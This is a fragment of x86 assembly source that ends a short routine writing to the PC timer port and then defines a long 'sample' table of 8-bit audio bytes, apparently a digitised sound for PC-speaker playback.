db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
